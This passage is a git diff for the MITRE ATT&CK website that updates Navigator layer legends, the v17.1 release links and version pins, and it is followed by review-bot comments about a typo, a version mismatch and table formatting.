+ "color": "#B99095", + "label": "patches: ATT&CK objects that have been patched while keeping the version the same. (e.g., 1.0 \u2192 1.0 but something like a typo, a URL, or some metadata was fixed)" + }, + { + "color": "#ff9000", + "label": "revocations: ATT&CK objects which are revoked by a different object." + }, + { + "color": "#ff6363", + "label": "deprecations: ATT&CK objects which are deprecated and no longer in use, and not replaced." + }, + { + "color": "#ff00e1", + "label": "deletions: ATT&CK objects which are no longer found in the STIX data." 
+ }, + { + "color": "#ffffff", + "label": "unchanged: ATT&CK objects which did not change between the two versions." + } + ], + "showTacticRowBackground": true, + "tacticRowBackground": "#205b8f", + "selectTechniquesAcrossTactics": true +} \ No newline at end of file diff --git a/modules/resources/static_pages/updates-april-2025.md b/modules/resources/static_pages/updates-april-2025.md index 4d1facfce51..d714cd7a429 100644 --- a/modules/resources/static_pages/updates-april-2025.md +++ b/modules/resources/static_pages/updates-april-2025.md @@ -8,7 +8,7 @@ save_as: resources/updates/updates-april-2025/index.html | Version | Start Date | End Date | Data | Changelogs | |:--------|:-----------|:---------|:-----|:-----------| -| [ATT&CK v17](/versions/v17) | April 22, 2025 | Current version of ATT&CK | [v17.0 on MITRE/CTI](https://github.com/mitre/cti/releases/tag/ATT%26CK-v17.0) | 16.1 - 17.0 [Details](/docs/changelogs/v16.1-v17.0/changelog-detailed.html) ([JSON](/docs/changelogs/v16.1-v17.0/changelog.json)) | +| [ATT&CK v17](/versions/v17) | April 22, 2025 | Current version of ATT&CK | [v17.0 on MITRE/CTI](https://github.com/mitre/cti/releases/tag/ATT%26CK-v17.0)
[v17.1 on MITRE/CTI](https://github.com/mitre/cti/releases/tag/ATT%26CK-v17.1) | 16.1 - 17.0 [Details](/docs/changelogs/v16.1-v17.0/changelog-detailed.html) ([JSON](/docs/changelogs/v16.1-v17.0/changelog.json))
17.0 - 17.1 [Details](/docs/changelogs/v17.0-v17.1/changelog-detailed.html) ([JSON](/docs/changelogs/v17.0-v17.1/changelog.json)) | The April 2025 (v17) ATT&CK release updates Techniques, Groups, Campaigns and Software for Enterprise, Mobile, and ICS. diff --git a/modules/site_config.py b/modules/site_config.py index 58c618a3047..9bb53627140 100644 --- a/modules/site_config.py +++ b/modules/site_config.py @@ -179,8 +179,8 @@ def set_subdirectory(subdirectory_str): "save_as: ${path}/${attack_id}-${domain}-layer.json\n" "json: " ) -layer_version = "4.4" -navigator_version = "4.8.1" +layer_version = "4.5" +navigator_version = "5.1.0" # Directory for test reports test_report_directory = "reports" diff --git a/pyproject.toml b/pyproject.toml index bb0a2b75dae..28c07c199ec 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -6,7 +6,7 @@ profile = "black" [tool.towncrier] name = "ATT&CK website" - version = "4.2.2" + version = "4.2.3" filename = "CHANGELOG.md" issue_format = "[#{issue}](https://github.com/mitre-attack/attack-website/issues/{issue})" template = ".towncrier.template.md" diff --git a/requirements.txt b/requirements.txt index 86b00a3983c..63b58156166 100644 --- a/requirements.txt +++ b/requirements.txt @@ -4,7 +4,7 @@ bleach==6.1.0 colorama==0.4.6 future==1.0.0 loguru==0.7.2 -mitreattack-python==4.0.0 +mitreattack-python==4.0.1 pelican==4.10.2 python-dotenv==1.0.1 requests==2.32.3
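Review bot: In the new layer-enterprise.json, layer-ics.json and layer-mobile.json hunks every technique entry carries `"comment": "patche"`, which is not a word; the legend in the same files calls this change class `patches`, so the value looks like a trailing-`s` strip applied to the plural key rather than an intended label. Since the comment is shown to users in the Navigator tooltip, either emit the legend key verbatim (`"comment": "patches"`) or a proper singular (`"comment": "patch"`) from whatever generates these files, and regenerate all three layers together so they stay consistent. Also, all three files end with `\ No newline at end of file`; adding the trailing newline keeps them diff-friendly.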
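Review bot: The site_config.py hunk sets `navigator_version = "5.1.0"`, but the three layer files added in this same change declare `"navigator": "5.0.0"` in their `versions` block, so the generated v17.0-v17.1 layers and the site's advertised Navigator version now disagree. The `layer_version = "4.5"` bump does match the `"layer": "4.5"` in the new files, so only the navigator value is out of step; either regenerate the layers with the 5.1.0 generator or set the config to the version the layers were actually produced with, and document in docs/RELEASE.md which of the two is the source of truth.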
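Review bot: In the updates-april-2025.md hunk the header `@@ -8,7 +8,7 @@` shows the replaced table row is one physical line, so the breaks that appear here between `[v17.0 on MITRE/CTI](...)` and `[v17.1 on MITRE/CTI](...)` in the Data cell, and between the `16.1 - 17.0` and `17.0 - 17.1` entries in the Changelogs cell, must be inline markup such as `<br>`; please confirm that is what is in the file, because a raw newline inside a Markdown table cell ends the row and the second link would render as stray text below the table. The row label is still `[ATT&CK v17](/versions/v17)` with the April 22, 2025 start date, which is fine for a point release, but the Changelogs cell now lists two ranges under one version, so a short note in the row (or on the page) that 17.1 is a patch release would help readers.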
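Review bot: The requirements.txt hunk bumps `mitreattack-python==4.0.0` to `mitreattack-python==4.0.1` without any statement of why; if that release is what fixes the layer comment text or is required to read the v17.1 STIX bundle, say so in the commit message or the pyproject/CHANGELOG entry so the pin is not reverted later as an unexplained change. Keeping the exact `==` pin is correct for a build that must reproduce the published site, so only the rationale is missing.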